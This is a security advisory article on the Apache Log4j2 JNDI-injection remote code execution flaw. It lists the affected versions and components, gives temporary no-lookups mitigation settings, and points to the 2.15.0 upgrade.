How the Log4j2 RCE Flaw Threatened Global Systems and What to Do Now

Several hours ago, a remote code execution vulnerability in Apache Log4j2 was disclosed, allowing attackers to craft malicious data requests that trigger code execution. Major tech companies, including Baidu, have been affected.

According to the latest Apache announcement, Log4j‑2.15.0 has been released to fix the issue, and the official release process is underway.

Apache Log4j2 was originally written by Ceki Gülcü as part of the Apache Logging Services project. It is a Java logging framework that supersedes Log4j 1 with significant improvements and fixes for inherent problems in the Logback architecture.

Through the Log4j2 framework, developers can control log generation by defining log levels for each message.

The framework is widely used in business systems to record logs, often including error information derived from user input.

Vulnerability Description

The disclosed Log4j2 remote code execution flaw stems from a Java JNDI injection vulnerability: when user‑supplied data is logged, an attacker can craft a special request that triggers arbitrary code execution on the target server.

Affected versions: Apache Log4j 2.x ≤ 2.14.1

Known affected applications and components include:

spring-boot-starter-log4j2

Apache Solr

Apache Flink

Apache Druid

The vulnerability has been rated as “high severity” with a very low exploitation barrier. Numerous components and large‑scale applications such as Apache Solr, Apache Struts2, Apache Druid, and Apache Flink have already been impacted, requiring immediate remediation.

Mitigation

Apache has published a new version that resolves the flaw. Affected users should upgrade all Log4j2‑related applications to the latest Log4j‑2.15.0‑rc2 version and also update the known vulnerable components listed above.

Temporary mitigation recommendations:

Add JVM parameter -Dlog4j2.formatMsgNoLookups=true Set log4j2.formatMsgNoLookups=True Configure FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true Globally, many websites have already been compromised by this vulnerability, with examples such as Baidu and iCloud shown below.

Update

Apache’s release page now lists Log4j 2.15.0. The Maven dependencies are:

<dependencies>
  <dependency org="org.apache.logging.log4j" name="log4j-api" rev="2.15.0" />
  <dependency org="org.apache.logging.log4j" name="log4j-core" rev="2.15.0" />
</dependencies>

The official release is still in progress, so the 2.15 version is not yet publicly available. Maven Central currently hosts no artifacts; they are expected to appear after a few hours.

Reference links:

https://github.com/apache/logging-log4j2

https://repository.apache.org/service/local/repositories/releases/content/org/apache/logging/log4j/log4j-core/2.15.0/log4j-core-2.15.0.jar